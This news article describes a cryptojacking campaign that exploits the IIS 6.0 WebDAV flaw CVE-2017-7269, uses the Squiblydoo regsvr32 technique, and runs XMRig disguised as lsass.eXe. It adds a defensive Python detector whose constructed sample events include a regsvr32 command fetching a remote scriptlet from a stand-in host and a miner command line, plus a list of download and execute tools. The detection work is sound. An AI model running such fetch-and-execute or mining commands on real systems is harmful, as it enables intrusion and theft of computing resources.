As companies such as Google and Twitter keep tightening their crackdown on fake cryptocurrency advertisements, scammers appear to have shifted their focus to cryptocurrency mining, targeting government websites, messaging platforms and cloud servers, including Tesla's. New security findings indicate that cryptojackers are now exploiting flaws in old Windows software, with the attacks concentrated on Windows versions that are approaching or past the end of their official support.
Researchers at the US-based security firm F5 Networks have recently discovered that a vulnerability in Microsoft Internet Information Services 6.0 (IIS 6.0) is being exploited to plant malware and take control of Windows servers to mine the Electroneum cryptocurrency.
This is not the first time the IIS 6.0 vulnerability has been exploited: the same flaw was previously used in malware attacks attributed to the Lazarus group to mine Monero. The new wave of Electroneum-mining malware targets a buffer overflow vulnerability, CVE-2017-7269, in the WebDAV component of IIS 6.0 (so only servers with WebDAV enabled are exposed), and then uses the 'Squiblydoo' technique, in which regsvr32.exe loads a remote COM scriptlet through scrob
j.dll, to download and execute the malicious script while evading application whitelisting. The vulnerability affects Microsoft Windows Server 2003, an operating system that reached end of life (EOL) in July 2015.
According to reports, the malware drops a file named 'lsass.eXe' to mimic the legitimate 'lsass.exe' process (the Local Security Authority Subsystem Service) and avoid scrutiny, then runs it; the file is in fact a genuine 32-bit build of the XMRig cryptomining tool. Since Windows file names are case-insensitive, the odd capitalisation only makes the file look different in listings; what gives it away is that it runs from a location other than System32 and is not started by the usual parent process. The servers hosting the malware are reported to be in China, and the script directs the miner to mine Electroneum through several pools, depositing the proceeds in a single wallet.
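The three behaviours described above (the IIS worker process spawning a tool, regsvr32 pulling a remote scriptlet via scrobj.dll, and a look-alike lsass.exe running outside System32) are all visible in process-creation telemetry. The following detection logic is an added example written for this article, not code from F5 Networks or from the malware; the log format is a constructed, Sysmon-like key=value layout, the sample events are made up, and the set of suspicious child processes of w3wp.exe is an assumption.

```python
import ntpath
import re

# Constructed sample of process-creation events (Sysmon-style fields flattened
# to key=value pairs separated by '|'). Not a real capture.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Windows\System32\wininit.exe|Image=C:\Windows\System32\lsass.exe|CommandLine=C:\Windows\system32\lsass.exe",
    r"ParentImage=C:\Windows\System32\inetsrv\w3wp.exe|Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll",
    r"ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\Temp\lsass.eXe|CommandLine=lsass.eXe -o pool.example:3333 -u etnWALLET -p x",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s C:\Program Files\Vendor\plugin.dll",
]

# Squiblydoo: regsvr32 /s /n /u /i:<remote url> scrobj.dll
SQUIBLYDOO_URL = re.compile(r"/i:\s*https?://", re.IGNORECASE)
REAL_LSASS_DIR = r"c:\windows\system32"   # where the genuine lsass.exe lives
REAL_LSASS_PARENT = "wininit.exe"          # the genuine lsass.exe's parent
IIS_WORKER = "w3wp.exe"                    # IIS 6.0 worker process
# Assumed list of tools an IIS worker should never spawn on a web server.
SUSPICIOUS_IIS_CHILDREN = {
    "cmd.exe", "powershell.exe", "regsvr32.exe", "mshta.exe",
    "rundll32.exe", "certutil.exe", "bitsadmin.exe",
}


def parse_event(line):
    """Split 'Key=Value|Key=Value' into a dict; values may contain '='."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def basename(path):
    # Windows paths are case-insensitive, so compare in lower case.
    return ntpath.basename(path).lower()


def classify(event):
    """Return the list of rule names this event triggers (empty if benign)."""
    image = event.get("Image", "")
    parent = event.get("ParentImage", "")
    cmd = event.get("CommandLine", "")
    img, par = basename(image), basename(parent)
    hits = []

    # Rule 1: regsvr32 loading a remote scriptlet through scrobj.dll.
    if img == "regsvr32.exe" and SQUIBLYDOO_URL.search(cmd) and "scrobj.dll" in cmd.lower():
        hits.append("squiblydoo_remote_scriptlet")

    # Rule 2: anything called lsass.exe that is not the real one. Case tricks
    # such as 'lsass.eXe' are irrelevant; the path and the parent are what count.
    if img == "lsass.exe":
        if ntpath.dirname(image).lower() != REAL_LSASS_DIR or par != REAL_LSASS_PARENT:
            hits.append("lsass_masquerade")

    # Rule 3: the IIS worker process spawning a shell or a download/exec tool,
    # which is what successful exploitation of the web server looks like.
    if par == IIS_WORKER and img in SUSPICIOUS_IIS_CHILDREN:
        hits.append("iis_worker_spawned_tool")

    return hits


def scan(lines):
    """Return [(event_index, [rule, ...]), ...] for every event that fires a rule."""
    findings = []
    for index, line in enumerate(lines):
        hits = classify(parse_event(line))
        if hits:
            findings.append((index, hits))
    return findings


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(hits)}")
```

Run against the constructed sample, the genuine lsass.exe and the ordinary regsvr32 DLL registration stay quiet, while the w3wp.exe-spawned Squiblydoo command fires two rules and the miner running from C:\Windows\Temp fires the masquerade rule. Rule 2 deliberately keys on location and parent rather than on capitalisation, because a file system compare would treat lsass.eXe and lsass.exe as the same name.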
Reports further indicate that the campaign has deposited only around $99 worth of Electroneum in the attacker's wallet, which suggests limited success, although the attacker may be spreading earnings across several Electroneum wallets. A large number of machines still run outdated software, which attracts attackers and leaves those systems open to cryptomining attacks. We would therefore urge readers to keep their systems up to date and install all available security updates; servers still running IIS 6.0 on Windows Server 2003 are out of support and should be upgraded, or at the very least have WebDAV disabled, since that is the component CVE-2017-7269 lives in. We will keep you posted with further updates, so stay tuned.